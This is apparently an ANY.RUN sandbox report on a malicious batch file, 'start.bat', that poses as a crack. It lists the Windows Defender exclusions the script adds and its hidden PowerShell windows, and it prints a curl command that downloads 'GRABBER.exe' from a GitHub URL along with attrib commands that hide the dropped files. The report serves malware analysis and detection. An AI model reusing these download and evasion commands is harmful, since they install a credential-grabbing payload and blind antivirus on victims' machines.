File name:

start.bat

Full analysis: https://app.any.run/tasks/48f31dc9-d8d2-4bfc-b41e-74d1d78262c1
Verdict: Malicious activity
Analysis date: April 19, 2025, 04:05:21
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (3192), with CRLF line terminators
MD5:

C0901C0ABB672E8D9A75F17D28A0CB9F

SHA1:

AA7F2B9BC58D5C42792E23974A55401E63447D4F

SHA256:

DD07D59A1B317EDB4C9DAD07D42B4C8DA88BA0C77475BD96AEA46FF75C1D92DF

SSDEEP:

12288:Nb11wT8q8fcIr4Kj2dcW27jZQ+7EFKdPc90LicIEUpv0JLi/gCDrzZYG9VIi8iRj:Nuv8EIhhW2/eIich+8J2/jrVYG9sep

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5780)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 5352)

    • Changes Windows Defender settings

      • cmd.exe (PID: 5352)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1164)
      • cmd.exe (PID: 5352)
      • cmd.exe (PID: 616)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 616)
      • cmd.exe (PID: 5352)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 616)
      • cmd.exe (PID: 5352)

    • Executes script without checking the security policy

      • powershell.exe (PID: 5508)
      • powershell.exe (PID: 5360)
      • powershell.exe (PID: 4844)
      • powershell.exe (PID: 6044)
      • powershell.exe (PID: 2504)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 1568)
      • powershell.exe (PID: 1240)
      • powershell.exe (PID: 4776)
      • powershell.exe (PID: 6048)
      • powershell.exe (PID: 1348)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 616)
      • cmd.exe (PID: 5352)

    • Application launched itself

      • cmd.exe (PID: 5352)
      • cmd.exe (PID: 616)

    • Starts application with an unusual extension

      • cmd.exe (PID: 5352)

    • Executing commands from a ".bat" file

      • powershell.exe (PID: 1164)

    • Starts process via Powershell

      • powershell.exe (PID: 1164)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 616)
      • cmd.exe (PID: 5352)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 5352)

    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 5352)

    • Starts NET.EXE to display or manage information about active sessions

      • net.exe (PID: 6744)
      • cmd.exe (PID: 5352)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 5352)

    • Executable content was dropped or overwritten

      • curl.exe (PID: 300)
      • curl.exe (PID: 5020)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 5352)

  • INFO

    • Changes the display of characters in the console

      • cmd.exe (PID: 5352)

    • Checks supported languages

      • chcp.com (PID: 5124)
      • chcp.com (PID: 5416)
      • curl.exe (PID: 300)
      • Launcher.exe (PID: 1096)
      • curl.exe (PID: 5020)
      • start.exe (PID: 4024)

    • Creates files in the program directory

      • cmd.exe (PID: 5352)
      • curl.exe (PID: 300)
      • curl.exe (PID: 5020)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6048)

    • Reads the computer name

      • curl.exe (PID: 300)
      • Launcher.exe (PID: 1096)
      • curl.exe (PID: 5020)
      • start.exe (PID: 4024)

    • Execution of CURL command

      • cmd.exe (PID: 5352)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6564)
      • powershell.exe (PID: 2564)

    • Reads the machine GUID from the registry

      • Launcher.exe (PID: 1096)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2564)
      • powershell.exe (PID: 6564)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.gbr | Gerber format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
266
Monitored processes
138
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs powershell.exe no specs sppextcomobj.exe no specs findstr.exe no specs wscript.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs powershell.exe no specs powershell.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs doskey.exe no specs doskey.exe no specs doskey.exe no specs ping.exe no specs wscript.exe no specs powershell.exe no specs cmd.exe conhost.exe no specs doskey.exe no specs findstr.exe no specs cmd.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs chcp.com no specs findstr.exe no specs findstr.exe no specs rundll32.exe no specs doskey.exe no specs chcp.com no specs net.exe no specs net1.exe no specs timeout.exe no specs findstr.exe no specs powershell.exe no specs doskey.exe no specs doskey.exe no specs powershell.exe no specs findstr.exe no specs rundll32.exe no specs timeout.exe no specs doskey.exe no specs timeout.exe no specs rundll32.exe no specs ping.exe no specs powershell.exe no specs powershell.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs wscript.exe no specs rundll32.exe no specs mshta.exe no specs attrib.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs powershell.exe no specs doskey.exe no specs curl.exe timeout.exe no specs attrib.exe no specs timeout.exe no specs powershell.exe no specs powershell.exe no specs findstr.exe no specs ping.exe no specs powershell.exe no specs wscript.exe no specs launcher.exe no specs powershell.exe no specs curl.exe doskey.exe no specs attrib.exe no specs rundll32.exe no specs powershell.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs findstr.exe no specs doskey.exe no specs ping.exe no specs powershell.exe no specs doskey.exe no specs start.exe no specs findstr.exe no specs findstr.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208findstr /i "echo" "C:\Users\admin\Desktop\start.bat" C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
300curl -s -L "https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/GRABBER.exe" -o "Launcher.exe" C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
616C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\start.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
632attrib +h "C:\ProgramData\Crack\Launcher.exe" /s /d C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
668findstr /i "echo" "C:\Users\admin\Desktop\start.bat" C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
672doskey MORE=PATH C:\Windows\System32\doskey.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Keyboard History Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
736findstr /i "echo" "C:\Users\admin\Desktop\start.bat" C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
744findstr /i "echo" "C:\Users\admin\Desktop\start.bat" C:\Windows\System32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
780wscript /b C:\Windows\System32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
1
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
924attrib +h "C:\ProgramData\Crack\start.exe" /s /d C:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
Total events
63 760
Read events
63 758
Write events
2
Delete events
0

Modification events

(PID) Process:(1164) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(1164) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
Executable files
2
Suspicious files
1
Text files
111
Unknown types
0

Dropped files

PID
Process
Filename
Type
616cmd.exeC:\Users\admin\Desktop\kdotnWowau.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotaQCvqg.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotLBkar.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotDlbGF.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotVTiLC.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotfkirIm.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotBCARRR.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotpvNbtB.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotFXCQP.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
616cmd.exeC:\Users\admin\Desktop\kdotLEwOJv.battext
MD5:337065424ED27284C55B80741F912713
SHA256:4EF6F5F73F87CD552BF0DCEB245365C44996F94EB72AEB2CCEFE440FE055043B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
28
DNS requests
18
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2088
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
2088
SIHClient.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
756
lsass.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSr83eyJy3njhjVpn5bEpfc6MXawQQUOuEJhtTPGcKWdnRJdtzgNcZjY5oCEQDzZE5rbgBQI34JRr174fUd
unknown
whitelisted
756
lsass.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEFZnHQTqT5lMbxCBR1nSdZQ%3D
unknown
whitelisted
756
lsass.exe
GET
200
172.64.149.23:80
http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTPlNxcMEqnlIVyH5VuZ4lawhZX3QQU9oUKOxGG4QR9DqoLLNLuzGR7e64CEQCrZoa1YnvoBZaCEzAShkn1
unknown
whitelisted
756
lsass.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
whitelisted
756
lsass.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:137
whitelisted
20.190.160.20:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
google.com
  • 142.250.184.238
whitelisted
login.live.com
  • 20.190.160.20
  • 40.126.32.138
  • 40.126.32.72
  • 20.190.160.3
  • 20.190.160.132
  • 20.190.160.66
  • 40.126.32.76
  • 20.190.160.128
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 2.23.181.156
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
github.com
  • 140.82.121.3
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
start.bat